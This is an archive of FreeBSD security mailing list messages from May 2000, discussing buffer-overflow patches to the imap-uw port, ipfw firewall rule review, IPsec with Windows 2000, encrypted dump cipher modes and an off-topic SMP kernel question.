From owner-freebsd-security Sun May 7 1:26:20 2000 Delivered-To: freebsd-security@freebsd.org Received: from ady.warpnet.ro (ady.warpnet.ro [194.102.224.1]) by hub.freebsd.org (Postfix) with ESMTP id B4F5A37B6AA; Sun, 7 May 2000 01:26:08 -0700 (PDT) (envelope-from ady@warpnet.ro) Received: from localhost (ady@localhost) by ady.warpnet.ro (8.9.3/8.9.3) with ESMTP id LAA12112; Sun, 7 May 2000 11:29:28 +0300 (EEST) (envelope-from ady@warpnet.ro) Date: Sun, 7 May 2000 11:29:27 +0300 (EEST) From: Adrian Penisoara To: Kris Kennaway Cc: Warner Losh , security-officer@FreeBSD.org, freebsd-security@FreeBSD.org Subject: Re: port update: mail/imap-uw from 4.7c1 to 4.7c2 In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, On Sat, 6 May 2000, Kris Kennaway wrote: > On Sat, 6 May 2000, Adrian Penisoara wrote: > > > The author released yet another small update which fixes additional > > buffer overflows in dummy.c and env_unix.c in src/osdep/unix. > > I didn't get the chance to look at this port yet, but given the above I'm > inclined to keep the port FORBIDDEN for a while longer and give the author > time to finish fixing whatever other security holes he can find. The only > question is really how hard he's going to look for them. > > The alternative is reissuing advisories every time saying "whoops, the > imap-uw port is insecure again".."now it's fixed".."oops, it's still > insecure" > > Comments? You've got a point here; besides these fixes are pretty weird, just look at these diffs between 4.7c1 and 4.7c2: diff -ru imap-4.7c1/src/osdep/unix/dummy.c imap-4.7c2/src/osdep/unix/dummy.c --- imap-4.7c1/src/osdep/unix/dummy.c Thu Oct 7 23:29:30 1999 +++ imap-4.7c2/src/osdep/unix/dummy.c Wed May 3 20:34:29 2000 @@ -263,9 +263,10 @@ dummy_listed (stream,'/',dir,LATT_NOSELECT,contents); /* scan directory, ignore . and .. */ if (!dir || dir[strlen (dir) - 1] == '/') while (d = readdir (dp)) - if ((d->d_name[0] != '.') || - (d->d_name[1] && (((d->d_name[1] != '.') || d->d_name[2]) && - strcmp (d->d_name+1,MXINDEXNAME+2)))) { + if (((d->d_name[0] != '.') || + (d->d_name[1] && (((d->d_name[1] != '.') || d->d_name[2]) && + strcmp (d->d_name+1,MXINDEXNAME+2)))) && + (strlen (d->d_name) <= NETMAXMBX)) { /* see if name is useful */ if (dir) sprintf (tmp,"%s%s",dir,d->d_name); else strcpy (tmp,d->d_name); diff -ru imap-4.7c1/src/osdep/unix/env_unix.c imap-4.7c2/src/osdep/unix/env_unix.c --- imap-4.7c1/src/osdep/unix/env_unix.c Thu Jan 20 22:12:55 2000 +++ imap-4.7c2/src/osdep/unix/env_unix.c Wed May 3 20:33:01 2000 @@ -660,9 +660,15 @@ { char tmp[MAILTMPLEN]; if (dir || name) { /* if either argument provided */ - if (dir) strcpy (tmp,dir); /* write directory prefix */ + if (dir) { + if (strlen (dir) > NETMAXMBX) return NIL; + strcpy (tmp,dir); /* write directory prefix */ + } else tmp[0] = '\0'; /* otherwise null string */ - if (name) strcat (tmp,name);/* write name in directory */ + if (name) { + if (strlen (name) > NETMAXMBX) return NIL; + strcat (tmp,name); /* write name in directory */ + } /* validate name, return its name */ if (!mailboxfile (dst,tmp)) return NIL; } @@ -682,7 +688,8 @@ char *dir = myhomedir (); *dst = '\0'; /* default to empty string */ /* check invalid name */ - if (!name || !*name || (*name == '{')) return NIL; + if (!name || !*name || (*name == '{') || (strlen (name) > NETMAXMBX)) + return NIL; /* check for INBOX */ if (((name[0] == 'I') || (name[0] == 'i')) && ((name[1] == 'N') || (name[1] == 'n')) && I wonder if we'll see any s* functiontions replaced with sn* counterparts; or maybe this is about compatibility between Unix versions? Hmmm, shouldn't it be the time for a OpenIMAPd project to appear ? ;-)... Ady (@freebsd.ady.ro) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 7 1:38:26 2000 Delivered-To: freebsd-security@freebsd.org Received: from ady.warpnet.ro (ady.warpnet.ro [194.102.224.1]) by hub.freebsd.org (Postfix) with ESMTP id 6A5EF37B87C; Sun, 7 May 2000 01:38:18 -0700 (PDT) (envelope-from ady@freebsd.ady.ro) Received: from localhost (ady@localhost) by ady.warpnet.ro (8.9.3/8.9.3) with ESMTP id LAA12357; Sun, 7 May 2000 11:41:30 +0300 (EEST) (envelope-from ady@freebsd.ady.ro) Date: Sun, 7 May 2000 11:41:30 +0300 (EEST) From: Adrian Penisoara X-Sender: ady@ady.warpnet.ro To: Warner Losh Cc: Kris Kennaway , security-officer@FreeBSD.org, freebsd-security@FreeBSD.org Subject: Re: port update: mail/imap-uw from 4.7c1 to 4.7c2 In-Reply-To: <200005062225.QAA66596@harmony.village.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, 6 May 2000, Warner Losh wrote: > In message Kris Kennaway writes: > : The alternative is reissuing advisories every time saying "whoops, the > : imap-uw port is insecure again".."now it's fixed".."oops, it's still > : insecure" > > No. Let's mark it insecure. Let's continue to update it with buffer > overflow fixes as they happen. If we go for a whole month without > getting any new ones, then we'll reevaluate then. > > In the mean time, we don't update the imap advisory beyond "it is > broken, has a poor track record and runs at elevated privs. It is > being disabled until such time as it can be trusted again." and let > the author whine all he wants. > Forgive me for redudancy, but doesn't OpenIMAPd sound good enough for a new and useful project ? Thanks, Ady (@freebsd.ady.ro) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 7 5:19:40 2000 Delivered-To: freebsd-security@freebsd.org Received: from shell.r4k.net (r4k.net [194.109.74.200]) by hub.freebsd.org (Postfix) with ESMTP id 3407C37B528 for ; Sun, 7 May 2000 05:19:35 -0700 (PDT) (envelope-from _@shell.r4k.net) Received: (from _@localhost) by shell.r4k.net (8.9.3/8.9.3) id OAA09975 for freebsd-security@freebsd.org; Sun, 7 May 2000 14:28:54 +0200 (CEST) (envelope-from _) Date: Sun, 7 May 2000 14:28:54 +0200 From: Stephanie Wehner <_@r4k.net> To: freebsd-security@freebsd.org Subject: ipsec fbsd <-> win ? Message-ID: <20000507142854.A9870@r4k.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, Does anyone have any experience concerning the interaction of the current freebsd ipsec and the ipsec for win2k as its mentioned on the microsoft site ? Unfortunately I don't have any win2k around myself to test it. Thanks, bye, Stephanie ----------------------------<> _@r4k.net <>-----------------<> FreeBSD <>--- "I had to hit him -- he was starting to make sense." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 7 6:11:54 2000 Delivered-To: freebsd-security@freebsd.org Received: from grimreaper.grondar.za (grimreaper.grondar.za [196.7.18.138]) by hub.freebsd.org (Postfix) with ESMTP id 7423637B530 for ; Sun, 7 May 2000 06:11:46 -0700 (PDT) (envelope-from mark@grondar.za) Received: from grimreaper.grondar.za (localhost [127.0.0.1]) by grimreaper.grondar.za (8.9.3/8.9.3) with ESMTP id PAA18519; Sun, 7 May 2000 15:11:37 +0200 (SAST) (envelope-from mark@grimreaper.grondar.za) Message-Id: <200005071311.PAA18519@grimreaper.grondar.za> To: Marc Silver Cc: freebsd-security@FreeBSD.ORG Subject: Re: Firewall Rules References: <20000505080928.Q80532@draenor.org> In-Reply-To: <20000505080928.Q80532@draenor.org> ; from Marc Silver "Fri, 05 May 2000 08:09:28 +0200." Date: Sun, 07 May 2000 15:11:37 +0200 From: Mark Murray Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > I am currently working on some documentation on ipfw and natd with ppp. > The following rules are for a basic dialup firewall that will allow > connections on port 80. Are these rules sound, and if not, how could > they be improved? OK... > fwcmd="/sbin/ipfw" > $fwcmd -f flush > $fwcmd add divert natd all from any to any via tun0 Depends on what you are doing with natd. > $fwcmd add allow ip from any to any via lo0 > $fwcmd add allow ip from any to any via fxp0 OK. NP. Anyone internal can do anything. > $fwcmd add allow tcp from any to any out xmit tun0 setup Any outgoing TCP connections are accepted. > $fwcmd add allow tcp from any to any via tun0 established Any established TCP connections are OK. Works with above rule. > $fwcmd add pass log tcp from any to any 80 setup Allow incoming port 80. > $fwcmd add reset log tcp from any to any 113 in recv tun0 Kill port 113 traffic and log it. So far, so good. > $fwcmd add allow udp from any to x.x.x.x 53 out xmit tun0 > $fwcmd add allow udp from any to x.x.x.x 53 out xmit tun0 > $fwcmd add allow udp from x.x.x.x 53 to any in recv tun0 > $fwcmd add allow udp from x.x.x.x 53 to any in recv tun0 You want to allow DNS, and this will do it, but it will allow an attacker to attack you by setting his source (ephemeral) port to 53. Just be aware of this; there is probably not much you can do with ipfw - you need a firewall that can hold UDP state. Also - why the duplicates? > $fwcmd add 65435 allow icmp from any to any Allow ICMP. Why? > $fwcmd add 65435 deny log ip from any to any Kill everything else. Good. M -- Mark Murray Join the anti-SPAM movement: http://www.cauce.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 7 7:17: 1 2000 Delivered-To: freebsd-security@freebsd.org Received: from polaris.shore.net (polaris.shore.net [207.244.124.105]) by hub.freebsd.org (Postfix) with ESMTP id CA61D37C115 for ; Sun, 7 May 2000 07:16:55 -0700 (PDT) (envelope-from tjlegg@shore.net) Received: from eskimos.the-eleven.com [207.244.92.51] by polaris.shore.net with esmtp (Exim) id 12oRqZ-0006LG-00; Sun, 07 May 2000 10:15:51 -0400 Mime-Version: 1.0 X-Sender: tjlegg@shell2.shore.net Message-Id: In-Reply-To: <200005071311.PAA18519@grimreaper.grondar.za> References: <20000505080928.Q80532@draenor.org> <200005071311.PAA18519@grimreaper.grondar.za> Date: Sun, 7 May 2000 10:15:48 -0400 To: Mark Murray , Marc Silver From: Tom Legg Subject: Re: Firewall Rules Cc: freebsd-security@freebsd.org Content-Type: text/plain; charset="us-ascii" ; format="flowed" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 3:11 PM +0200 5/7/2000, Mark Murray wrote: > > $fwcmd add allow udp from any to x.x.x.x 53 out xmit tun0 >> $fwcmd add allow udp from any to x.x.x.x 53 out xmit tun0 >> $fwcmd add allow udp from x.x.x.x 53 to any in recv tun0 >> $fwcmd add allow udp from x.x.x.x 53 to any in recv tun0 > >You want to allow DNS, and this will do it, but it will allow an >attacker to attack you by setting his source (ephemeral) port >to 53. Just be aware of this; there is probably not much you can >do with ipfw - you need a firewall that can hold UDP state. > True. So delete the second and fourth lines to eliminate the duplicates. Then my first fix would be for the second line receiving dns replies. $fwcmd add allow udp from x.x.x.x 53 to any 1024-65535 in recv tun0 This at least removes probing of the privileged ports from a remote port 53. Of course you should check to see if you have any services running on unprivileged ports (databases or back orifice and the like are good examples) and deny external access to the ports that those services are listening on as well. But if you are up for it, you might want to set up a simple DNS server on the machine running ipfw, insert your ISPs DNS servers in to the userland ppp.conf or in to /etc/resolv.conf, then point your internal machines to use the DNS off of the internal interface of the ipfw machine and tighten the above rule to be $fwcmd add allow udp from x.x.x.x. 53 to ${oif} 1024-65535 in recv tun0 (${oif} is the outside interface, in this case tun0) Now I've never played around with NAT , but with the original set of rules wouldn't you still need a line in the ipfw rules to xmit the incoming DNS responses via the inside interface? Or does NAT sort of bypass the interface restrictions of ipfw? >-- >Mark Murray >Join the anti-SPAM movement: http://www.cauce.org > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message -- ----- Tom Legg tjlegg@shore.net http://www.shore.net/~tjlegg/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 7 21:58:52 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 340BD37BC14; Sun, 7 May 2000 21:58:48 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id WAA42850; Sun, 7 May 2000 22:58:47 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id WAA75704; Sun, 7 May 2000 22:58:34 -0600 (MDT) Message-Id: <200005080458.WAA75704@harmony.village.org> To: Adrian Penisoara Subject: Re: port update: mail/imap-uw from 4.7c1 to 4.7c2 Cc: Kris Kennaway , security-officer@FreeBSD.org, freebsd-security@FreeBSD.org In-reply-to: Your message of "Sun, 07 May 2000 11:29:27 +0300." References: Date: Sun, 07 May 2000 22:58:33 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message Adrian Penisoara writes: : + if (!name || !*name || (*name == '{') || (strlen (name) > NETMAXMBX)) This one troubles me most. If name has already exceeded its buffer, then you may already be hosed. Actually, that might not be the whole story and this check is good (w/o looking at the source I don't know). Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 8 1: 3:38 2000 Delivered-To: freebsd-security@freebsd.org Received: from tld.follo.net (tld.follo.net [195.204.143.184]) by hub.freebsd.org (Postfix) with ESMTP id 900D737B5F5 for ; Mon, 8 May 2000 01:03:27 -0700 (PDT) (envelope-from terje@elde.net) Received: by tld.follo.net (Postfix, from userid 1001) id D6B5E7D79; Mon, 8 May 2000 10:03:08 +0200 (CEST) Date: Mon, 8 May 2000 10:03:07 +0200 From: Terje Elde To: freebsd-security@FreeBSD.ORG Subject: Re: ipsec fbsd <-> win ? Message-ID: <20000508100307.C1302@tld.follo.net> References: <20000507142854.A9870@r4k.net> Mime-Version: 1.0 Content-Type: application/pgp; x-action=sign; format=text Content-Disposition: inline; filename="msg.pgp" User-Agent: Mutt/1.1.14i In-Reply-To: <20000507142854.A9870@r4k.net>; from _@r4k.net on Sun, May 07, 2000 at 02:28:54PM +0200 X-Editor: Vim http://www.vim.org/ X-IRC: ircii!epic4-2000 - prevail[1214] X-Goal: Exterminate All Rational Thought Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 * Stephanie Wehner (_@r4k.net) [000507 17:16]: > Does anyone have any experience concerning the interaction of the current > freebsd ipsec and the ipsec for win2k as its mentioned on the microsoft > site ? Unfortunately I don't have any win2k around myself to test it. Chances are you'll have some problems until racoon is up and running. I must admit I have not checked the win2k version out as well as I should have, but assuming it's been implemented with just a bit of clue, it will not rely on the same encryption keys for a huge amount of time/data, and thus you'll need racoon for the dynamic keys. Unless I'm misunderstanding something that is. You might want to try Maikel Verheijen's patched version, which he's made available at http://home.worldonline.nl/~maikel/racoon.tar.gz Terje - -- Terje Elde | Yes Interactive AS | voice: +47 64 85 52 00 terje@yes.no | http://www.yes.no/ | fax: +47 64 85 52 01 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.1 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE5FnS78HLgLrwmRg0RAvP7AJ9O+ZDkp8D1aJZ1Bg3GCLBOTW23yQCgkJzo dGxIM6NKbQNF+p7bZ6/whDI= =phU4 -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 8 4:23:22 2000 Delivered-To: freebsd-security@freebsd.org Received: from eastwood.aldigital.algroup.co.uk (eastwood.aldigital.algroup.co.uk [194.128.162.193]) by hub.freebsd.org (Postfix) with ESMTP id B677537C37E for ; Mon, 8 May 2000 04:22:59 -0700 (PDT) (envelope-from adam@algroup.co.uk) Received: from algroup.co.uk ([192.168.192.2]) by eastwood.aldigital.algroup.co.uk (8.8.8/8.6.12) with ESMTP id JAA03564; Mon, 8 May 2000 09:37:22 GMT Message-ID: <39168AD1.FD8BAC38@algroup.co.uk> Date: Mon, 08 May 2000 10:37:21 +0100 From: Adam Laurie X-Mailer: Mozilla 4.7 [en-gb] (Win98; I) X-Accept-Language: en MIME-Version: 1.0 To: Mark Murray Cc: Marc Silver , freebsd-security@FreeBSD.ORG Subject: Re: Firewall Rules References: <20000505080928.Q80532@draenor.org> <200005071311.PAA18519@grimreaper.grondar.za> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Mark Murray wrote: > > $fwcmd add allow udp from any to x.x.x.x 53 out xmit tun0 > > $fwcmd add allow udp from any to x.x.x.x 53 out xmit tun0 > > $fwcmd add allow udp from x.x.x.x 53 to any in recv tun0 > > $fwcmd add allow udp from x.x.x.x 53 to any in recv tun0 > > You want to allow DNS, and this will do it, but it will allow an > attacker to attack you by setting his source (ephemeral) port > to 53. Just be aware of this; there is probably not much you can > do with ipfw - you need a firewall that can hold UDP state. this works with ipfw: # block low port incoming UDP but allow outgoing and replies for DNS, NTP # (and anything else that needs it). $fwcmd add pass udp from any to any 53,123 $fwcmd add deny udp from any to any 0-1023,1110,2049 $fwcmd add pass udp from any to any 1110 & 2049 are blocked to protect NFS - you will need to block any other high ports that you have real services running on. cheers, Adam -- Adam Laurie Tel: +44 (181) 742 0755 A.L. Digital Ltd. Fax: +44 (181) 742 5995 Voysey House Barley Mow Passage http://www.aldigital.co.uk London W4 4GB mailto:adam@algroup.co.uk UNITED KINGDOM PGP key on keyservers To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 8 13:48: 3 2000 Delivered-To: freebsd-security@freebsd.org Received: from haldjas.folklore.ee (Haldjas.folklore.ee [193.40.6.121]) by hub.freebsd.org (Postfix) with ESMTP id 7741D37BC34 for ; Mon, 8 May 2000 13:47:57 -0700 (PDT) (envelope-from narvi@haldjas.folklore.ee) Received: from localhost (narvi@localhost) by haldjas.folklore.ee (8.9.3/8.9.3) with SMTP id WAA05304; Mon, 8 May 2000 22:47:31 +0200 (EET) (envelope-from narvi@haldjas.folklore.ee) Date: Mon, 8 May 2000 22:47:31 +0200 (EET) From: Narvi To: Mark Murray Cc: "Andrew J. Korty" , security@FreeBSD.ORG Subject: Re: Cryptographic dump(8) In-Reply-To: <200005042015.WAA07617@grimreaper.grondar.za> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 4 May 2000, Mark Murray wrote: > > I was under the impression that the CBC mode would also propagate this > > entry throughout the block. Must I use one of the feedback modes? > > Yes. I have no hard references in front of me, but I'll put ${bodypart} > on a block that CBC is 8-bytes-at-a-time-with-same-key-each-time. IE not > good enough to stave off known plaintext attacks. CBC is what you'd use > if the entire plaintext is of unpredictable structure. > Another thing to consider (and I am yet to see it in this discussion): Say a block relatively in the beginning of the dump gets read off the tape corrupted. Any encryption scheme in which such means that the entire dump is worthless is less than satisfactory in most environments. Losing the entire backup to the chaining mode just because one block reads incorrectly is a bad idea. Known plaintext attacks - more exactly *chosen plaintext* attacks are imho unavidable in backups. They must be fought in some other way. WO backups are no good. If we use CBC, we should restart it with a new IV on every block boundary or so to minimise damage. > M > -- > Mark Murray > Join the anti-SPAM movement: http://www.cauce.org > Sander To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 8 20:22:42 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 10A1C37BC1E; Mon, 8 May 2000 20:22:41 -0700 (PDT) (envelope-from kris@FreeBSD.org) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id UAA51434; Mon, 8 May 2000 20:22:40 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Mon, 8 May 2000 20:22:40 -0700 (PDT) From: Kris Kennaway To: Narvi Cc: Mark Murray , "Andrew J. Korty" , security@FreeBSD.ORG Subject: Re: Cryptographic dump(8) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 8 May 2000, Narvi wrote: > Losing the entire backup to the chaining mode just because one block reads > incorrectly is a bad idea. Known plaintext attacks - more exactly *chosen > plaintext* attacks are imho unavidable in backups. See my reply :) Kris ---- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 9 6: 6:22 2000 Delivered-To: freebsd-security@freebsd.org Received: from winschoten.vuurwerk.nl (winschoten.vuurwerk.nl [194.178.232.122]) by hub.freebsd.org (Postfix) with SMTP id 9FC4737BE36 for ; Tue, 9 May 2000 06:06:15 -0700 (PDT) (envelope-from petervd@vuurwerk.nl) Received: (qmail 23235 invoked from network); 9 May 2000 13:06:09 -0000 Received: from kesteren.vuurwerk.nl (HELO vuurwerk.nl) (194.178.232.59) by winschoten.vuurwerk.nl with SMTP; 9 May 2000 13:06:09 -0000 Received: (qmail 42538 invoked by uid 11109); 9 May 2000 13:06:09 -0000 Mail-Followup-To: security@freebsd.org Date: Tue, 9 May 2000 15:06:09 +0200 From: Peter van Dijk To: security@freebsd.org Subject: envy.vuurwerk.nl daily run output Message-ID: <20000509150609.L42267@vuurwerk.nl> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org [snip] Backup passwd and group files: envy.vuurwerk.nl passwd diffs: 3c3 < root:(password):0:0::0:0:Charlie &:/root:/usr/local/bin/bash --- > root:(password):0:0::0:0:Charlie &:/root:/usr/local/bin/bash [snip] This line needed some thinking from me until I realized that it was trying to tell me the rootpassword changed (which I already knew, ofcourse). Could this be made more obvious, something like (password1) in the top one and (password2) in the bottom one? Greetz, Peter. -- Peter van Dijk - student/sysadmin/ircoper/madly in love/pretending coder | | 'C makes it easy to shoot yourself in the foot; | C++ makes it harder, but when you do it blows your whole leg off.' | Bjarne Stroustrup, Inventor of C++ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 9 6:20: 9 2000 Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (f9.law8.hotmail.com [216.33.241.9]) by hub.freebsd.org (Postfix) with SMTP id 9212F37BDFC for ; Tue, 9 May 2000 06:20:05 -0700 (PDT) (envelope-from madrapour@hotmail.com) Received: (qmail 4408 invoked by uid 0); 9 May 2000 13:20:04 -0000 Message-ID: <20000509132004.4407.qmail@hotmail.com> Received: from 195.146.33.150 by www.hotmail.com with HTTP; Tue, 09 May 2000 06:20:04 PDT X-Originating-IP: [195.146.33.150] From: "N. N.M" To: security@freebsd.org Subject: Maybe off topic Date: Tue, 09 May 2000 06:20:04 PDT Mime-Version: 1.0 Content-Type: text/plain; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi everybody, Sorry in advance if my question sound off. I installed FreeBSD 3.2 on a dual-processor PC. How can I get sure that OS detects that? (it seems that it doesn't). Do I need any extra configuration (more than default configuration) to force FreeBSD 3.2 to detect it? All comments are appreciated. Thanks a lot, Nazila M. ________________________________________________________________________ Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 9 6:32: 8 2000 Delivered-To: freebsd-security@freebsd.org Received: from cricket.mindcrime.net (cricket.mindcrime.net [209.70.202.96]) by hub.freebsd.org (Postfix) with ESMTP id 41AFF37BE08 for ; Tue, 9 May 2000 06:32:03 -0700 (PDT) (envelope-from sagem@cricket.mindcrime.net) Received: from cricket.mindcrime.net (cricket.mindcrime.net [209.70.202.96]) by cricket.mindcrime.net (8.9.3/8.9.3) with ESMTP id IAA36221; Tue, 9 May 2000 08:33:51 GMT (envelope-from sagem@cricket.mindcrime.net) Date: Tue, 9 May 2000 08:33:51 +0000 (GMT) From: sage@ec-raves.com X-Sender: sagem@cricket.mindcrime.net To: "N. N.M" Cc: security@FreeBSD.ORG Subject: Re: Maybe off topic In-Reply-To: <20000509132004.4407.qmail@hotmail.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org comment out these #cpu I386_CPU #cpu I486_CPU uncomment out these # To make an SMP kernel, the next two are needed options SMP # Symmetric MultiProcessor Kernel options APIC_IO # Symmetric (APIC) I/O and recompile your kernel On Tue, 9 May 2000, N. N.M wrote: > Hi everybody, > > Sorry in advance if my question sound off. I installed FreeBSD 3.2 on a > dual-processor PC. How can I get sure that OS detects that? (it seems that > it doesn't). Do I need any extra configuration (more than default > configuration) to force FreeBSD 3.2 to detect it? > > All comments are appreciated. > Thanks a lot, > Nazila M. > ________________________________________________________________________ > Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 9 7:28:51 2000 Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (f7.law8.hotmail.com [216.33.241.7]) by hub.freebsd.org (Postfix) with SMTP id B575837BE98 for ; Tue, 9 May 2000 07:28:44 -0700 (PDT) (envelope-from madrapour@hotmail.com) Received: (qmail 11448 invoked by uid 0); 9 May 2000 14:28:43 -0000 Message-ID: <20000509142843.11447.qmail@hotmail.com> Received: from 195.96.144.44 by www.hotmail.com with HTTP; Tue, 09 May 2000 07:28:43 PDT X-Originating-IP: [195.96.144.44] From: "N. N.M" To: andersonfox@mail.ru, sage@ec-raves.com Cc: security@freebsd.org Subject: Re: Maybe off topic Date: Tue, 09 May 2000 07:28:43 PDT Mime-Version: 1.0 Content-Type: text/plain; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Thanks both of you for your comments. I tried what one of you told me about commenting out two lines (i386 and i384) and uncommenting out the lines related to SMP support and then recompile the kernel. But nothing was changed. And in the output of "top" command I still don't have CPU0 and CPU1. Any other idea on what I can check or change? thanks a lot for your time, Nazila M. >From: Fox Anderson >To: "N. N.M" >Subject: Re: Maybe off topic >Date: Wed, 10 May 2000 16:25:19 +0300 > >ΧΤ , 09 ΝΑΚ 2000, χΩ ΞΑΠΙΣΑΜΙ: > > Hi everybody, > > > > Sorry in advance if my question sound off. I installed FreeBSD 3.2 on a > > dual-processor PC. How can I get sure that OS detects that? (it seems >that > > it doesn't). Do I need any extra configuration (more than default > > configuration) to force FreeBSD 3.2 to detect it? > > > > All comments are appreciated. > > Thanks a lot, > > Nazila M. > > ________________________________________________________________________ > > Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > >You have to compile your kernel with SMP support. Then reboot and run top. >You'll see CPU0 and CPU1 in STATE column. > good luck. ________________________________________________________________________ Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 9 7:37:14 2000 Delivered-To: freebsd-security@freebsd.org Received: from testbed.baileylink.net (testbed.baileylink.net [63.71.213.24]) by hub.freebsd.org (Postfix) with ESMTP id EF5DD37BE8E for ; Tue, 9 May 2000 07:37:03 -0700 (PDT) (envelope-from brad@testbed.baileylink.net) Received: (from brad@localhost) by testbed.baileylink.net (8.9.3/8.9.3) id JAA07701; Tue, 9 May 2000 09:37:10 -0500 (CDT) (envelope-from brad) Date: Tue, 9 May 2000 09:37:10 -0500 From: Brad Guillory To: "N. N.M" Cc: andersonfox@mail.ru, sage@ec-raves.com, freebsd-security@freebsd.org Subject: Very far off topic (was Maybe off topic) Message-ID: <20000509093710.B5901@baileylink.net> References: <20000509142843.11447.qmail@hotmail.com> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Mailer: Mutt 1.0i In-Reply-To: <20000509142843.11447.qmail@hotmail.com>; from madrapour@hotmail.com on Tue, May 09, 2000 at 07:28:43AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is very very far off charter. There is a SMP mailing list, why did you choose security? Please move this thread there. More info about the mailing lists are here: http://www.freebsd.org/handbook/eresources.html#ERESOURCES-MAIL And you can search the archives here: http://www.freebsd.org/search/#mailinglists BMG On Tue, May 09, 2000 at 07:28:43AM -0700, N. N.M wrote: > Thanks both of you for your comments. I tried what one of you told me about > commenting out two lines (i386 and i384) and uncommenting out the lines > related to SMP support and then recompile the kernel. But nothing was > changed. And in the output of "top" command I still don't have CPU0 and > 